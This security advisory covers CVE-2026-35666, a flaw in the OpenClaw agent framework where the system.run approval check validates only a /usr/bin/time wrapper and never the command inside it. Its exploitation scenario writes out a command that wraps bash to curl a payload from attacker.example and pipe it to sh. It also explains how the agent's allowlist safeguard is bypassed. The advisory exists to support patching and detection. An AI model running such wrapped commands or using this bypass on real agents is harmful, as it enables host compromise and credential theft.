CVE-2026-35666: OpenClaw allowlist bypass enables

CISO Take

OpenClaw before 2026.3.22 contains a security bypass in its `system.run` approval mechanism: the allowlist validation checks the `/usr/bin/time` wrapper but never inspects the inner command, allowing any low-privileged user to reuse an existing approval state to execute otherwise-restricted binaries. With a CVSS of 8.8, network-accessible attack vector, low complexity, and no user interaction required, the exploitation barrier is minimal — any authenticated session can weaponize this in seconds. No active exploitation is confirmed and CISA has not added it to KEV, but the technique is trivially reproducible and OpenClaw's ecosystem has a documented history of malicious skill abuse (AIID #1368) that this bypass could directly enable. Patch to 2026.3.22 immediately; if delayed, disable `system.run` or wrap the agent process in a restricted OS user with no write access outside its working directory.

Sources: NVD GitHub Advisory ATLAS VulnCheck

What is the risk?

High risk for any production OpenClaw deployment. The CVSS 8.8 score is well-supported: network reachability (AV:N), low complexity (AC:L), and low privilege requirement (PR:L) combine to make this accessible to any authenticated user — including compromised agent sessions or rogue plugin code. AI agents typically run with elevated OS permissions to perform automation tasks, which amplifies the blast radius well beyond a standard application vulnerability. With 395 prior CVEs in the same package, active security research scrutiny is high, increasing the probability that a weaponized PoC will surface quickly. The absence of EPSS data and public exploits at time of publication provides only marginal comfort.

How does the attack unfold?

Initial Access

Attacker authenticates to an OpenClaw deployment with low-privilege credentials or compromises an existing agent session or plugin.

AML.T0012

Exploitation

Attacker crafts a `system.run` invocation wrapping a restricted command with `/usr/bin/time`, triggering the approval-state reuse flaw (CWE-706) to bypass the executable allowlist.

AML.T0107

Execution

The inner command executes under the agent's OS identity without triggering any allowlist violation, as only the `time` wrapper is validated.

AML.T0053

Impact

Attacker achieves full confidentiality, integrity, and availability compromise of the host system, enabling credential theft, data exfiltration, or persistence within the AI agent environment.

AML.T0112.000

Initial Access

Attacker authenticates to an OpenClaw deployment with low-privilege credentials or compromises an existing agent session or plugin.

AML.T0012

Exploitation

Attacker crafts a `system.run` invocation wrapping a restricted command with `/usr/bin/time`, triggering the approval-state reuse flaw (CWE-706) to bypass the executable allowlist.

AML.T0107

Execution

The inner command executes under the agent's OS identity without triggering any allowlist violation, as only the `time` wrapper is validated.

AML.T0053

Impact

Attacker achieves full confidentiality, integrity, and availability compromise of the host system, enabling credential theft, data exfiltration, or persistence within the AI agent environment.

AML.T0112.000

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
OpenClaw	pip	—	No patch
4 dependents 37% patched ~3d to patch Full package profile →

Do you use OpenClaw? You're affected.

How severe is it?

CVSS 3.1

8.8 / 10

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What is the attack surface?

AV Network

AC Low

PR Low

UI None

S Unchanged

C High

I High

A High

What should I do?

5 steps

Upgrade OpenClaw to ≥2026.3.22 (patches in commits 630f147 and 394099b).
If immediate patching is blocked, disable system.run entirely or restrict it to a dedicated OS user with a minimal, read-only filesystem view and no network egress.
Detect exploitation attempts by auditing agent execution logs for time-prefixed invocations wrapping non-time commands (regex: \/usr\/bin\/time\s+[^-]).
Apply OS-level mandatory access control (AppArmor/SELinux) profiles to the OpenClaw process to constrain executable paths independent of application-layer allowlists.
Review GHSA-qm9x-v7cx-7rq4 and apply vendor-recommended configuration hardening if patching is delayed.

How is it classified?

Auth Bypass Code Execution Agent Plugin AML.T0049 - Exploit Public-Facing Application AML.T0053 - AI Agent Tool Invocation AML.T0107 - Exploitation for Defense Evasion AML.T0112.000 - Local AI Agent

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.6.2.5 - AI system security

NIST AI RMF

MANAGE 2.4 - Mechanisms to respond to AI risks

OWASP LLM Top 10

LLM06 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-35666?

OpenClaw before 2026.3.22 contains a security bypass in its `system.run` approval mechanism: the allowlist validation checks the `/usr/bin/time` wrapper but never inspects the inner command, allowing any low-privileged user to reuse an existing approval state to execute otherwise-restricted binaries. With a CVSS of 8.8, network-accessible attack vector, low complexity, and no user interaction required, the exploitation barrier is minimal — any authenticated session can weaponize this in seconds. No active exploitation is confirmed and CISA has not added it to KEV, but the technique is trivially reproducible and OpenClaw's ecosystem has a documented history of malicious skill abuse (AIID #1368) that this bypass could directly enable. Patch to 2026.3.22 immediately; if delayed, disable `system.run` or wrap the agent process in a restricted OS user with no write access outside its working directory.

Is CVE-2026-35666 actively exploited?

No confirmed active exploitation of CVE-2026-35666 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-35666?

1. Upgrade OpenClaw to ≥2026.3.22 (patches in commits 630f147 and 394099b). 2. If immediate patching is blocked, disable `system.run` entirely or restrict it to a dedicated OS user with a minimal, read-only filesystem view and no network egress. 3. Detect exploitation attempts by auditing agent execution logs for `time`-prefixed invocations wrapping non-time commands (regex: `\/usr\/bin\/time\s+[^-]`). 4. Apply OS-level mandatory access control (AppArmor/SELinux) profiles to the OpenClaw process to constrain executable paths independent of application-layer allowlists. 5. Review GHSA-qm9x-v7cx-7rq4 and apply vendor-recommended configuration hardening if patching is delayed.

What systems are affected by CVE-2026-35666?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, agentic pipelines, AI code execution environments, autonomous task runners.

What is the CVSS score for CVE-2026-35666?

CVE-2026-35666 has a CVSS v3.1 base score of 8.8 (HIGH).

What is the AI security impact?

Affected AI Architectures

agent frameworksagentic pipelinesAI code execution environmentsautonomous task runners

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application

AML.T0053 AI Agent Tool Invocation

AML.T0107 Exploitation for Defense Evasion

AML.T0112.000 Local AI Agent

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.6.2.5

NIST AI RMF: MANAGE 2.4

OWASP LLM Top 10: LLM06

What are the technical details?

Original Advisory

OpenClaw before 2026.3.22 contains an allowlist bypass vulnerability in system.run approvals that fails to unwrap /usr/bin/time wrappers. Attackers can bypass executable binding restrictions by using an unregistered time wrapper to reuse approval state for inner commands.

Exploitation Scenario

An attacker with a low-privilege account or a compromised OpenClaw plugin session identifies that `/usr/bin/time` holds an existing approval or is not on the denylist. They invoke `system.run('/usr/bin/time /bin/bash -c "curl https://attacker.example/payload | sh"')`. The approval engine resolves the executable as `time` (approved), reuses its approval state, and passes execution without evaluating the inner shell command. The payload executes under the agent's OS identity — potentially with access to API keys, cloud credentials, or internal network resources mounted in the agent's environment. In a multi-tenant or shared AI platform context, this could pivot from one tenant's agent session to host-level access.

Weaknesses (CWE)

CWE-706 Use of Incorrectly-Resolved Name or Reference

CWE-706 — Use of Incorrectly-Resolved Name or Reference: The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.

Source: MITRE CWE corpus.